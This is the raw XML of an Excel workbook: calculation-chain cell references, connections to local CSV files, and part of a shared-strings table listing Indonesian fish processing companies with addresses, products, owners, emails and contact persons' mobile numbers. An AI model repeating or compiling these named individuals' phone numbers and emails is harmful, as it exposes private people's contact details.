  <c r="L1819" i="2"/>
  <c r="K1819" i="2"/>
  <c r="L1818" i="2"/>
  <c r="K1818" i="2"/>
  <c r="L1817" i="2"/>
  <c r="K1817" i="2"/>
  <c r="L1816" i="2"/>
  <c r="K1816" i="2"/>
  <c r="L1815" i="2"/>
  <c r="K1815" i="2"/>
  <c r="L1814" i="2"/>
  <c r="K1814" i="2"/>
  <c r="L1813" i="2"/>
  <c r="K1813" i="2"/>
  <c r="L937" i="2"/>
  <c r="K937" i="2"/>
  <c r="L936" i="2"/>
  <c r="K936" i="2"/>
  <c r="L956" i="2"/>
  <c r="K956" i="2"/>
  <c r="L803" i="2"/>
  <c r="K803" i="2"/>
  <c r="L1812" i="2"/>
  <c r="K1812" i="2"/>
  <c r="L802" i="2"/>
  <c r="K802" i="2"/>
  <c r="L801" i="2"/>
  <c r="K801" i="2"/>
  <c r="L955" i="2"/>
  <c r="K955" i="2"/>
  <c r="L954" i="2"/>
  <c r="K954" i="2"/>
  <c r="L1811" i="2"/>
  <c r="K1811" i="2"/>
  <c r="L1810" i="2"/>
  <c r="K1810" i="2"/>
  <c r="L1809" i="2"/>
  <c r="K1809" i="2"/>
  <c r="L306" i="2"/>
  <c r="K306" i="2"/>
  <c r="L1808" i="2"/>
  <c r="K1808" i="2"/>
  <c r="L305" i="2"/>
  <c r="K305" i="2"/>
  <c r="L304" i="2"/>
  <c r="K304"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527" i="2"/>
  <c r="K1527" i="2"/>
  <c r="L1795" i="2"/>
  <c r="K1795" i="2"/>
  <c r="L1794" i="2"/>
  <c r="K1794" i="2"/>
  <c r="L1793" i="2"/>
  <c r="K1793" i="2"/>
  <c r="L1792" i="2"/>
  <c r="K1792" i="2"/>
  <c r="L1791" i="2"/>
  <c r="K1791" i="2"/>
  <c r="L1105" i="2"/>
  <c r="K1105" i="2"/>
  <c r="L1550" i="2"/>
  <c r="K1550" i="2"/>
  <c r="L1549" i="2"/>
  <c r="K1549" i="2"/>
  <c r="L1790" i="2"/>
  <c r="K1790" i="2"/>
  <c r="L1789" i="2"/>
  <c r="K1789" i="2"/>
  <c r="L1574" i="2"/>
  <c r="K1574" i="2"/>
  <c r="L833" i="2"/>
  <c r="K833" i="2"/>
  <c r="L522" i="2"/>
  <c r="K522" i="2"/>
  <c r="L832" i="2"/>
  <c r="K832" i="2"/>
  <c r="L684" i="2"/>
  <c r="K684" i="2"/>
  <c r="L1788" i="2"/>
  <c r="K1788" i="2"/>
  <c r="L1787" i="2"/>
  <c r="K1787" i="2"/>
  <c r="L1786" i="2"/>
  <c r="K1786" i="2"/>
  <c r="L1785" i="2"/>
  <c r="K1785" i="2"/>
  <c r="L777" i="2"/>
  <c r="K777" i="2"/>
  <c r="L1784" i="2"/>
  <c r="K1784" i="2"/>
  <c r="L1000" i="2"/>
  <c r="K1000" i="2"/>
  <c r="L1783" i="2"/>
  <c r="K1783" i="2"/>
  <c r="L1526" i="2"/>
  <c r="K1526" i="2"/>
  <c r="L1573" i="2"/>
  <c r="K1573" i="2"/>
  <c r="L1572" i="2"/>
  <c r="K1572" i="2"/>
  <c r="L1571" i="2"/>
  <c r="K1571" i="2"/>
  <c r="L1570" i="2"/>
  <c r="K1570" i="2"/>
  <c r="L1569" i="2"/>
  <c r="K1569" i="2"/>
  <c r="L1782" i="2"/>
  <c r="K1782" i="2"/>
  <c r="L1781" i="2"/>
  <c r="K1781" i="2"/>
  <c r="L1780" i="2"/>
  <c r="K1780" i="2"/>
  <c r="L837" i="2"/>
  <c r="K837" i="2"/>
  <c r="L1779" i="2"/>
  <c r="K1779" i="2"/>
  <c r="L1778" i="2"/>
  <c r="K1778" i="2"/>
  <c r="L1777" i="2"/>
  <c r="K1777" i="2"/>
  <c r="L1776" i="2"/>
  <c r="K1776" i="2"/>
  <c r="L1250" i="2"/>
  <c r="K1250" i="2"/>
  <c r="L1264" i="2"/>
  <c r="K1264" i="2"/>
  <c r="L1775" i="2"/>
  <c r="K1775" i="2"/>
  <c r="L1263" i="2"/>
  <c r="K1263" i="2"/>
  <c r="L1774" i="2"/>
  <c r="K1774" i="2"/>
  <c r="L1773" i="2"/>
  <c r="K1773" i="2"/>
  <c r="L1772" i="2"/>
  <c r="K1772" i="2"/>
  <c r="L1142" i="2"/>
  <c r="K1142" i="2"/>
  <c r="L1771" i="2"/>
  <c r="K1771" i="2"/>
  <c r="L1475" i="2"/>
  <c r="K1475" i="2"/>
  <c r="L1474" i="2"/>
  <c r="K1474" i="2"/>
  <c r="L1473" i="2"/>
  <c r="K1473" i="2"/>
  <c r="L1548" i="2"/>
  <c r="K1548" i="2"/>
  <c r="L1420" i="2"/>
  <c r="K1420" i="2"/>
  <c r="L1419" i="2"/>
  <c r="K1419" i="2"/>
  <c r="L1770" i="2"/>
  <c r="K1770" i="2"/>
  <c r="L1769" i="2"/>
  <c r="K1769" i="2"/>
  <c r="L891" i="2"/>
  <c r="K891" i="2"/>
  <c r="L890" i="2"/>
  <c r="K890" i="2"/>
  <c r="L1428" i="2"/>
  <c r="K1428" i="2"/>
  <c r="L1427" i="2"/>
  <c r="K1427" i="2"/>
  <c r="L1547" i="2"/>
  <c r="K1547" i="2"/>
  <c r="L1546" i="2"/>
  <c r="K1546" i="2"/>
  <c r="L1545" i="2"/>
  <c r="K1545" i="2"/>
  <c r="L1544" i="2"/>
  <c r="K1544" i="2"/>
  <c r="L1543" i="2"/>
  <c r="K1543" i="2"/>
  <c r="L1542" i="2"/>
  <c r="K1542" i="2"/>
  <c r="L935" i="2"/>
  <c r="K935" i="2"/>
  <c r="L1768" i="2"/>
  <c r="K1768" i="2"/>
  <c r="L1767" i="2"/>
  <c r="K1767" i="2"/>
  <c r="L1766" i="2"/>
  <c r="K1766" i="2"/>
  <c r="L1765" i="2"/>
  <c r="K1765" i="2"/>
  <c r="L1429" i="2"/>
  <c r="K1429" i="2"/>
  <c r="L1472" i="2"/>
  <c r="K1472"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414" i="2"/>
  <c r="K1414"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883" i="2"/>
  <c r="K883" i="2"/>
  <c r="L651" i="2"/>
  <c r="K651" i="2"/>
  <c r="L887" i="2"/>
  <c r="K887" i="2"/>
  <c r="L886" i="2"/>
  <c r="K886" i="2"/>
  <c r="L1735" i="2"/>
  <c r="K1735" i="2"/>
  <c r="L1734" i="2"/>
  <c r="K1734" i="2"/>
  <c r="L650" i="2"/>
  <c r="K650" i="2"/>
  <c r="L630" i="2"/>
  <c r="K630" i="2"/>
  <c r="L1733" i="2"/>
  <c r="K1733" i="2"/>
  <c r="L1732" i="2"/>
  <c r="K1732" i="2"/>
  <c r="L1731" i="2"/>
  <c r="K1731" i="2"/>
  <c r="L1342" i="2"/>
  <c r="K1342" i="2"/>
  <c r="L193" i="2"/>
  <c r="K193" i="2"/>
  <c r="L149" i="2"/>
  <c r="K149" i="2"/>
  <c r="L196" i="2"/>
  <c r="K196" i="2"/>
  <c r="L173" i="2"/>
  <c r="K173" i="2"/>
  <c r="L194" i="2"/>
  <c r="K194" i="2"/>
  <c r="L86" i="2"/>
  <c r="K86" i="2"/>
  <c r="L119" i="2"/>
  <c r="K119" i="2"/>
  <c r="L156" i="2"/>
  <c r="K156" i="2"/>
  <c r="L1730" i="2"/>
  <c r="K1730" i="2"/>
  <c r="L1729" i="2"/>
  <c r="K1729" i="2"/>
  <c r="L1728" i="2"/>
  <c r="K1728" i="2"/>
  <c r="L953" i="2"/>
  <c r="K953" i="2"/>
  <c r="L1727" i="2"/>
  <c r="K1727" i="2"/>
  <c r="L1726" i="2"/>
  <c r="K1726" i="2"/>
  <c r="L720" i="2"/>
  <c r="K720" i="2"/>
  <c r="L1141" i="2"/>
  <c r="K1141" i="2"/>
  <c r="L1140" i="2"/>
  <c r="K1140"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952" i="2"/>
  <c r="K952" i="2"/>
  <c r="L923" i="2"/>
  <c r="K923" i="2"/>
  <c r="L951" i="2"/>
  <c r="K951" i="2"/>
  <c r="L950" i="2"/>
  <c r="K950" i="2"/>
  <c r="L1703" i="2"/>
  <c r="K1703" i="2"/>
  <c r="L261" i="2"/>
  <c r="K261" i="2"/>
  <c r="L260" i="2"/>
  <c r="K260" i="2"/>
  <c r="L259" i="2"/>
  <c r="K259" i="2"/>
  <c r="L1702" i="2"/>
  <c r="K1702" i="2"/>
  <c r="L1701" i="2"/>
  <c r="K1701" i="2"/>
  <c r="L1700" i="2"/>
  <c r="K1700" i="2"/>
  <c r="L1699" i="2"/>
  <c r="K1699" i="2"/>
  <c r="L1698" i="2"/>
  <c r="K1698" i="2"/>
  <c r="L1697" i="2"/>
  <c r="K1697" i="2"/>
  <c r="L1139" i="2"/>
  <c r="K1139" i="2"/>
  <c r="L1696" i="2"/>
  <c r="K1696" i="2"/>
  <c r="L1695" i="2"/>
  <c r="K1695" i="2"/>
  <c r="L1694" i="2"/>
  <c r="K1694" i="2"/>
  <c r="L1693" i="2"/>
  <c r="K1693" i="2"/>
  <c r="L775" i="2"/>
  <c r="K775" i="2"/>
  <c r="L774" i="2"/>
  <c r="K774" i="2"/>
  <c r="L773" i="2"/>
  <c r="K773" i="2"/>
  <c r="L772" i="2"/>
  <c r="K772" i="2"/>
  <c r="L771" i="2"/>
  <c r="K771" i="2"/>
  <c r="L770" i="2"/>
  <c r="K770" i="2"/>
  <c r="L769" i="2"/>
  <c r="K769" i="2"/>
  <c r="L768" i="2"/>
  <c r="K768" i="2"/>
  <c r="L767" i="2"/>
  <c r="K767" i="2"/>
  <c r="L1692" i="2"/>
  <c r="K1692" i="2"/>
  <c r="L1691" i="2"/>
  <c r="K1691" i="2"/>
  <c r="L1690" i="2"/>
  <c r="K1690" i="2"/>
  <c r="L1689" i="2"/>
  <c r="K1689" i="2"/>
  <c r="L836" i="2"/>
  <c r="K836" i="2"/>
  <c r="L1688" i="2"/>
  <c r="K1688" i="2"/>
  <c r="L1687" i="2"/>
  <c r="K1687" i="2"/>
  <c r="L1686" i="2"/>
  <c r="K1686" i="2"/>
  <c r="L1685" i="2"/>
  <c r="K1685" i="2"/>
  <c r="L32" i="2"/>
  <c r="K32" i="2"/>
  <c r="L1684" i="2"/>
  <c r="K1684" i="2"/>
  <c r="L1683" i="2"/>
  <c r="K1683" i="2"/>
  <c r="L949" i="2"/>
  <c r="K949" i="2"/>
  <c r="L948" i="2"/>
  <c r="K948" i="2"/>
  <c r="L947" i="2"/>
  <c r="K947" i="2"/>
  <c r="L1276" i="2"/>
  <c r="K1276" i="2"/>
  <c r="L1138" i="2"/>
  <c r="K1138" i="2"/>
  <c r="L1682" i="2"/>
  <c r="K1682" i="2"/>
  <c r="L1137" i="2"/>
  <c r="K1137" i="2"/>
  <c r="L1136" i="2"/>
  <c r="K1136" i="2"/>
  <c r="L347" i="2"/>
  <c r="K347" i="2"/>
  <c r="L349" i="2"/>
  <c r="K349" i="2"/>
  <c r="L1681" i="2"/>
  <c r="K1681" i="2"/>
  <c r="L344" i="2"/>
  <c r="K344" i="2"/>
  <c r="L1680" i="2"/>
  <c r="K1680" i="2"/>
  <c r="L1679" i="2"/>
  <c r="K1679" i="2"/>
  <c r="L1678" i="2"/>
  <c r="K1678" i="2"/>
  <c r="L1677" i="2"/>
  <c r="K1677" i="2"/>
  <c r="L1676" i="2"/>
  <c r="K1676" i="2"/>
  <c r="L1675" i="2"/>
  <c r="K1675" i="2"/>
  <c r="L1674" i="2"/>
  <c r="K1674" i="2"/>
  <c r="L1568" i="2"/>
  <c r="K1568" i="2"/>
  <c r="L1673" i="2"/>
  <c r="K1673" i="2"/>
  <c r="L1672" i="2"/>
  <c r="K1672" i="2"/>
  <c r="L1671" i="2"/>
  <c r="K1671" i="2"/>
  <c r="L1670" i="2"/>
  <c r="K1670" i="2"/>
  <c r="L1135" i="2"/>
  <c r="K1135" i="2"/>
  <c r="L1134" i="2"/>
  <c r="K1134" i="2"/>
  <c r="L1669" i="2"/>
  <c r="K1669" i="2"/>
  <c r="L1668" i="2"/>
  <c r="K1668" i="2"/>
  <c r="L1667" i="2"/>
  <c r="K1667" i="2"/>
  <c r="L1666" i="2"/>
  <c r="K1666" i="2"/>
  <c r="L1665" i="2"/>
  <c r="K1665" i="2"/>
  <c r="L1664" i="2"/>
  <c r="K1664" i="2"/>
  <c r="L1663" i="2"/>
  <c r="K1663" i="2"/>
  <c r="L1662" i="2"/>
  <c r="K1662" i="2"/>
  <c r="L1133" i="2"/>
  <c r="K1133" i="2"/>
  <c r="L1132" i="2"/>
  <c r="K1132" i="2"/>
  <c r="L1661" i="2"/>
  <c r="K1661" i="2"/>
  <c r="L1660" i="2"/>
  <c r="K1660" i="2"/>
  <c r="L1659" i="2"/>
  <c r="K1659" i="2"/>
  <c r="L1658" i="2"/>
  <c r="K1658" i="2"/>
  <c r="L1657" i="2"/>
  <c r="K1657" i="2"/>
  <c r="L1656" i="2"/>
  <c r="K1656" i="2"/>
  <c r="L1655" i="2"/>
  <c r="K1655" i="2"/>
  <c r="L1654" i="2"/>
  <c r="K1654" i="2"/>
  <c r="L1653" i="2"/>
  <c r="K1653" i="2"/>
  <c r="L1652" i="2"/>
  <c r="K1652" i="2"/>
  <c r="L1651" i="2"/>
  <c r="K1651" i="2"/>
  <c r="L1466" i="2"/>
  <c r="K1466" i="2"/>
  <c r="L811" i="2"/>
  <c r="K811" i="2"/>
  <c r="L810" i="2"/>
  <c r="K810" i="2"/>
  <c r="L1650" i="2"/>
  <c r="K1650" i="2"/>
  <c r="L1649" i="2"/>
  <c r="K1649" i="2"/>
  <c r="L1648" i="2"/>
  <c r="K1648" i="2"/>
  <c r="L1647" i="2"/>
  <c r="K1647" i="2"/>
  <c r="L1646" i="2"/>
  <c r="K1646" i="2"/>
  <c r="L1645" i="2"/>
  <c r="K1645" i="2"/>
  <c r="L1069" i="2"/>
  <c r="K1069" i="2"/>
  <c r="L1068" i="2"/>
  <c r="K1068" i="2"/>
  <c r="L1067" i="2"/>
  <c r="K1067" i="2"/>
  <c r="L1644" i="2"/>
  <c r="K1644" i="2"/>
  <c r="L600" i="2"/>
  <c r="K600" i="2"/>
  <c r="L573" i="2"/>
  <c r="K573" i="2"/>
  <c r="L451" i="2"/>
  <c r="K451" i="2"/>
  <c r="L282" i="2"/>
  <c r="K282" i="2"/>
  <c r="L281" i="2"/>
  <c r="K281" i="2"/>
  <c r="L1643" i="2"/>
  <c r="K1643" i="2"/>
  <c r="L599" i="2"/>
  <c r="K599" i="2"/>
  <c r="L572" i="2"/>
  <c r="K572" i="2"/>
  <c r="L450" i="2"/>
  <c r="K450" i="2"/>
  <c r="L280" i="2"/>
  <c r="K280" i="2"/>
  <c r="L279" i="2"/>
  <c r="K279" i="2"/>
  <c r="L331" i="2"/>
  <c r="K331" i="2"/>
  <c r="L1131" i="2"/>
  <c r="K1131" i="2"/>
  <c r="L776" i="2"/>
  <c r="K776" i="2"/>
  <c r="L225" i="2"/>
  <c r="K225" i="2"/>
  <c r="L142" i="2"/>
  <c r="K142" i="2"/>
  <c r="L835" i="2"/>
  <c r="K835" i="2"/>
  <c r="L1104" i="2"/>
  <c r="K1104" i="2"/>
  <c r="L1103" i="2"/>
  <c r="K1103" i="2"/>
  <c r="L819" i="2"/>
  <c r="K819" i="2"/>
  <c r="L818" i="2"/>
  <c r="K818" i="2"/>
  <c r="L137" i="2"/>
  <c r="K137" i="2"/>
  <c r="L136" i="2"/>
  <c r="K136" i="2"/>
  <c r="L135" i="2"/>
  <c r="K135" i="2"/>
  <c r="L134" i="2"/>
  <c r="K134" i="2"/>
  <c r="L133" i="2"/>
  <c r="K133" i="2"/>
  <c r="L132" i="2"/>
  <c r="K132" i="2"/>
  <c r="L131" i="2"/>
  <c r="K131" i="2"/>
  <c r="L130" i="2"/>
  <c r="K130" i="2"/>
  <c r="L129" i="2"/>
  <c r="K129" i="2"/>
  <c r="L128" i="2"/>
  <c r="K128" i="2"/>
  <c r="L127" i="2"/>
  <c r="K127" i="2"/>
  <c r="L126" i="2"/>
  <c r="K126" i="2"/>
  <c r="L1541" i="2"/>
  <c r="K1541" i="2"/>
  <c r="L1540" i="2"/>
  <c r="K1540" i="2"/>
  <c r="L1539" i="2"/>
  <c r="K1539" i="2"/>
  <c r="L1642" i="2"/>
  <c r="K1642" i="2"/>
  <c r="L817" i="2"/>
  <c r="K817" i="2"/>
  <c r="L1130" i="2"/>
  <c r="K1130" i="2"/>
  <c r="L1282" i="2"/>
  <c r="K1282" i="2"/>
  <c r="L582" i="2"/>
  <c r="K582" i="2"/>
  <c r="L816" i="2"/>
  <c r="K816" i="2"/>
  <c r="L1097" i="2"/>
  <c r="K1097" i="2"/>
  <c r="L1641" i="2"/>
  <c r="K1641" i="2"/>
  <c r="L1640" i="2"/>
  <c r="K1640" i="2"/>
  <c r="L1639" i="2"/>
  <c r="K1639" i="2"/>
  <c r="L946" i="2"/>
  <c r="K946" i="2"/>
  <c r="L1638" i="2"/>
  <c r="K1638" i="2"/>
  <c r="L1637" i="2"/>
  <c r="K1637" i="2"/>
  <c r="L1129" i="2"/>
  <c r="K1129" i="2"/>
  <c r="L1636" i="2"/>
  <c r="K1636" i="2"/>
  <c r="L1635" i="2"/>
  <c r="K1635" i="2"/>
  <c r="L1634" i="2"/>
  <c r="K1634" i="2"/>
  <c r="L1128" i="2"/>
  <c r="K1128" i="2"/>
  <c r="L988" i="2"/>
  <c r="K988" i="2"/>
  <c r="L581" i="2"/>
  <c r="K581" i="2"/>
  <c r="L1633" i="2"/>
  <c r="K1633" i="2"/>
  <c r="L1127" i="2"/>
  <c r="K1127" i="2"/>
  <c r="L1632" i="2"/>
  <c r="K1632" i="2"/>
  <c r="L1471" i="2"/>
  <c r="K1471" i="2"/>
  <c r="L1470" i="2"/>
  <c r="K1470" i="2"/>
  <c r="L1631" i="2"/>
  <c r="K1631" i="2"/>
  <c r="L1630" i="2"/>
  <c r="K1630" i="2"/>
  <c r="L1629" i="2"/>
  <c r="K1629" i="2"/>
  <c r="L1628" i="2"/>
  <c r="K1628" i="2"/>
  <c r="L1627" i="2"/>
  <c r="K1627" i="2"/>
  <c r="L1626" i="2"/>
  <c r="K1626" i="2"/>
  <c r="L436" i="2"/>
  <c r="K436" i="2"/>
  <c r="L1102" i="2"/>
  <c r="K1102" i="2"/>
  <c r="L1625" i="2"/>
  <c r="K1625" i="2"/>
  <c r="L1522" i="2"/>
  <c r="K1522"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126" i="2"/>
  <c r="K1126" i="2"/>
  <c r="L1125" i="2"/>
  <c r="K1125" i="2"/>
  <c r="L1612" i="2"/>
  <c r="K1612" i="2"/>
  <c r="L1124" i="2"/>
  <c r="K1124" i="2"/>
  <c r="L1611" i="2"/>
  <c r="K1611" i="2"/>
  <c r="L1610" i="2"/>
  <c r="K1610" i="2"/>
  <c r="L1123" i="2"/>
  <c r="K1123" i="2"/>
  <c r="L1122" i="2"/>
  <c r="K1122" i="2"/>
  <c r="L1609" i="2"/>
  <c r="K1609" i="2"/>
  <c r="L1608" i="2"/>
  <c r="K1608" i="2"/>
  <c r="L1121" i="2"/>
  <c r="K1121"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25" i="2"/>
  <c r="K1525" i="2"/>
  <c r="L1585" i="2"/>
  <c r="K1585" i="2"/>
  <c r="L1584" i="2"/>
  <c r="K1584" i="2"/>
  <c r="L1524" i="2"/>
  <c r="K1524" i="2"/>
  <c r="L1523" i="2"/>
  <c r="K1523" i="2"/>
  <c r="L1583" i="2"/>
  <c r="K1583" i="2"/>
  <c r="L1582" i="2"/>
  <c r="K1582" i="2"/>
  <c r="L1581" i="2"/>
  <c r="K1581" i="2"/>
  <c r="L1580" i="2"/>
  <c r="K1580" i="2"/>
  <c r="L1579" i="2"/>
  <c r="K1579" i="2"/>
  <c r="L999" i="2"/>
  <c r="K999" i="2"/>
  <c r="L1578" i="2"/>
  <c r="K1578" i="2"/>
  <c r="L1577" i="2"/>
  <c r="K1577" i="2"/>
  <c r="AQ214" i="1"/>
  <c r="AP383" i="1"/>
  <c r="AP106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4EDA28-D1FF-544B-819E-0B1AA2A66905}" name="upi_plus_sarpras" type="6" refreshedVersion="7" background="1" saveData="1">
    <textPr codePage="10000" sourceFile="/Users/PH/Dropbox/14. DBSKPONLINE/upi_plus_sarpras.csv" decimal="," thousands="." tab="0" comma="1">
      <textFields count="4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2695C313-3CE6-F24D-93D8-960D3C649FCF}" name="upi_realisasi-pasar" type="6" refreshedVersion="7" background="1" saveData="1">
    <textPr codePage="10000" sourceFile="/Users/PH/Dropbox/14. DBSKPONLINE/upi_realisasi-pasar.csv" decimal="," thousands="." tab="0" comma="1">
      <textFields count="10">
        <textField/>
        <textField/>
        <textField/>
        <textField/>
        <textField/>
        <textField/>
        <textField/>
        <textField/>
        <textField/>
        <textField/>
      </textFields>
    </textPr>
  </connection>
  <connection id="3" xr16:uid="{7B571AE3-DF7E-5F4B-8544-69A9CF122BAF}" name="upi-nib-npwp" type="6" refreshedVersion="7" background="1" saveData="1">
    <textPr codePage="10000" sourceFile="/Users/PH/Dropbox/14. DBSKPONLINE/upi-nib-npwp.csv" decimal="," thousands="." comma="1">
      <textFields count="3">
        <textField/>
        <textField/>
        <textField/>
      </textFields>
    </textPr>
  </connection>
  <connection id="4" xr16:uid="{152F1182-E010-0C4C-8503-E15DDDD0B62A}" name="upi-tenagakerja" type="6" refreshedVersion="7" background="1" saveData="1">
    <textPr codePage="10000" sourceFile="/Users/PH/Dropbox/14. DBSKPONLINE/upi-tenagakerja.csv" decimal="," thousands="." comma="1">
      <textFields count="4">
        <textField/>
        <textField/>
        <textField/>
        <textField/>
      </textFields>
    </textPr>
  </connection>
</connections>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="102488" uniqueCount="17759">
  <si>
    <t>upi_id</t>
  </si>
  <si>
    <t>zero_upi_name</t>
  </si>
  <si>
    <t>provinsi</t>
  </si>
  <si>
    <t>alamat</t>
  </si>
  <si>
    <t>olahan</t>
  </si>
  <si>
    <t>produk</t>
  </si>
  <si>
    <t>tgl_terbit</t>
  </si>
  <si>
    <t>id</t>
  </si>
  <si>
    <t>upi_produksi_group_id</t>
  </si>
  <si>
    <t>gbeku_unit</t>
  </si>
  <si>
    <t>gdingin_unit</t>
  </si>
  <si>
    <t>abf_unit</t>
  </si>
  <si>
    <t>cpf_unit</t>
  </si>
  <si>
    <t>tunelf_unit</t>
  </si>
  <si>
    <t>brinef_unit</t>
  </si>
  <si>
    <t>seamer_unit</t>
  </si>
  <si>
    <t>bakcuci_unit</t>
  </si>
  <si>
    <t>baktampung_unit</t>
  </si>
  <si>
    <t>retort_unit</t>
  </si>
  <si>
    <t>gkering_unit</t>
  </si>
  <si>
    <t>gbeku_sum</t>
  </si>
  <si>
    <t>gdingin_sum</t>
  </si>
  <si>
    <t>abf_sum</t>
  </si>
  <si>
    <t>cpf_sum</t>
  </si>
  <si>
    <t>tunelf_sum</t>
  </si>
  <si>
    <t>brinef_sum</t>
  </si>
  <si>
    <t>seamer_sum</t>
  </si>
  <si>
    <t>bakcuci_sum</t>
  </si>
  <si>
    <t>baktampung_sum</t>
  </si>
  <si>
    <t>retort_sum</t>
  </si>
  <si>
    <t>gkering_sum</t>
  </si>
  <si>
    <t>pemilik_upi</t>
  </si>
  <si>
    <t>kodepos_upi</t>
  </si>
  <si>
    <t>provinsi_upi</t>
  </si>
  <si>
    <t>kabupaten_upi</t>
  </si>
  <si>
    <t>regency_id</t>
  </si>
  <si>
    <t>kecamatan_upi</t>
  </si>
  <si>
    <t>desa_upi</t>
  </si>
  <si>
    <t>email_upi</t>
  </si>
  <si>
    <t>omzet_upi</t>
  </si>
  <si>
    <t>tahunmulai_upi</t>
  </si>
  <si>
    <t>kontak_upi</t>
  </si>
  <si>
    <t>kontakperson_upi</t>
  </si>
  <si>
    <t>penanggungjawab_upi</t>
  </si>
  <si>
    <t>jenis_upi</t>
  </si>
  <si>
    <t>skala_upi</t>
  </si>
  <si>
    <t>CV. SARANA MAJU BERSAMA</t>
  </si>
  <si>
    <t>Sumatera Utara</t>
  </si>
  <si>
    <t>Jl. Perjuangan Dusun III No.476, Kel. Helvetia, Kec. Labuhan Deli, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>Lainnya</t>
  </si>
  <si>
    <t>Kepiting Hidup, Kerang Hidup</t>
  </si>
  <si>
    <t>Edhi Priastoto</t>
  </si>
  <si>
    <t>Labuhan Deli</t>
  </si>
  <si>
    <t>Helvetia</t>
  </si>
  <si>
    <t>smajubersama@yahoo.com</t>
  </si>
  <si>
    <t>2.5 - 50</t>
  </si>
  <si>
    <t>Sumina 082167620640</t>
  </si>
  <si>
    <t>UPIH (Unit Penanganan Ikan Hidup)</t>
  </si>
  <si>
    <t>menengah</t>
  </si>
  <si>
    <t>PT. SIGER JAYA ABADI</t>
  </si>
  <si>
    <t>Lampung</t>
  </si>
  <si>
    <t>Jl. Raya Tanjung Bintang No.99, Kel. Serdang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan</t>
  </si>
  <si>
    <t>Lainnya, Kaleng</t>
  </si>
  <si>
    <t>Udang Pasteurisasi Dalam Kaleng, Cup Plastik, Kemasan Plastik, Daging Rajungan Pasteurisasi Dalam Kaleng, Cup Plastik, Kantung Plastik, Pouch Aluminium</t>
  </si>
  <si>
    <t>PULUNG NUGROHO, S. KOM</t>
  </si>
  <si>
    <t>Tanjung Bintang</t>
  </si>
  <si>
    <t>Serdang</t>
  </si>
  <si>
    <t>nenimurni@ymail.com</t>
  </si>
  <si>
    <t>&amp;lt;2.5</t>
  </si>
  <si>
    <t>NENI WULANDARI (082185605864)</t>
  </si>
  <si>
    <t>PULUNG NUGROHO, S.KOM</t>
  </si>
  <si>
    <t>UPI (Unit Pengolahan Ikan)</t>
  </si>
  <si>
    <t>kecil</t>
  </si>
  <si>
    <t>PT. MURIA BAHARI INDONESIA</t>
  </si>
  <si>
    <t>Jawa Tengah</t>
  </si>
  <si>
    <t>Jl. Raya Tulis RT 03 RW 08, Kel. Besito, Kec. Gebog, Kabupaten Kudus</t>
  </si>
  <si>
    <t>Lainnya, Beku</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi, Kerang Beku, Udang Beku, Udang Kipas Beku, Rajungan Beku, Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Alex Faisol Tas'an Wartono</t>
  </si>
  <si>
    <t>Gebog</t>
  </si>
  <si>
    <t>Besito</t>
  </si>
  <si>
    <t>admin@mbi-seafood.com</t>
  </si>
  <si>
    <t>&gt; 50</t>
  </si>
  <si>
    <t>0291-4259111</t>
  </si>
  <si>
    <t>Ary Syaiful Bachri 08112706678, Wenny Puspitasari 082323695889</t>
  </si>
  <si>
    <t>Ary Syaiful Bachri</t>
  </si>
  <si>
    <t>besar</t>
  </si>
  <si>
    <t>PT. PRASETYA AGUNG CAHAYA UTAMA</t>
  </si>
  <si>
    <t>Bali</t>
  </si>
  <si>
    <t>Jl. A. Yani I, Dusun Carik Padang, Kel. Nyambu, Kec. Kediri, Kabupaten Tabanan</t>
  </si>
  <si>
    <t>Beku, Asap</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Beku, Ikan Asap Beku</t>
  </si>
  <si>
    <t>Harryanto Mulia</t>
  </si>
  <si>
    <t>Kediri</t>
  </si>
  <si>
    <t>Nyambu</t>
  </si>
  <si>
    <t>ptpacu@gmail.com</t>
  </si>
  <si>
    <t>0361-812828, 0361-812830</t>
  </si>
  <si>
    <t>Harryanto Mulia / Umar 081553734957</t>
  </si>
  <si>
    <t>PT. KUNIMOTO FOODS</t>
  </si>
  <si>
    <t>DKI Jakarta</t>
  </si>
  <si>
    <t>Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Segar, Beku, Kering</t>
  </si>
  <si>
    <t>Telur Bulu Babi Segar, Scallop Beku, Cephalopoda Beku, Sirip Pari Kering, Kerang Segar, Abalone Segar, Ikan Pelagis Segar, Kepiting Beku, Udang Beku, Ikan Demersal Segar, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Setyo Budi Heri Sasmito, SE.</t>
  </si>
  <si>
    <t>Kembangan</t>
  </si>
  <si>
    <t>Srengseng</t>
  </si>
  <si>
    <t>kuniyafoods@gmail.com</t>
  </si>
  <si>
    <t>0215857172, Adi Setiyono 08882601691</t>
  </si>
  <si>
    <t>Adi Setiyono 08882601691</t>
  </si>
  <si>
    <t>PT. SANJAYA INTERNASIONAL FISHERY</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Beku, Segar</t>
  </si>
  <si>
    <t>Salmon Beku, Salmon Segar, Telur Salmon Beku, Pari Beku, Udang Kipas Beku, Sidat Panggang Beku, Surimi Beku, Produk Perikanan Bernilai Tambah Beku, Wakame Beku, Salmon Beku, Trout Beku, Salmon Segar, Trout Segar, Cephalopoda Beku, Cephalopoda Segar, Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Demersal Segar, Pari Segar, Udang Kipas Segar, Kerang Segar, Udang Beku, Udang Segar, Kerang Beku, Hiu Beku</t>
  </si>
  <si>
    <t>NIAH</t>
  </si>
  <si>
    <t>Penjaringan</t>
  </si>
  <si>
    <t>Pluit</t>
  </si>
  <si>
    <t>pt_sif_jkt@yahoo.co.id</t>
  </si>
  <si>
    <t>ANTONI &amp; 081316633628</t>
  </si>
  <si>
    <t>ANTONI</t>
  </si>
  <si>
    <t>PT. SUMBER MINA BAHARI</t>
  </si>
  <si>
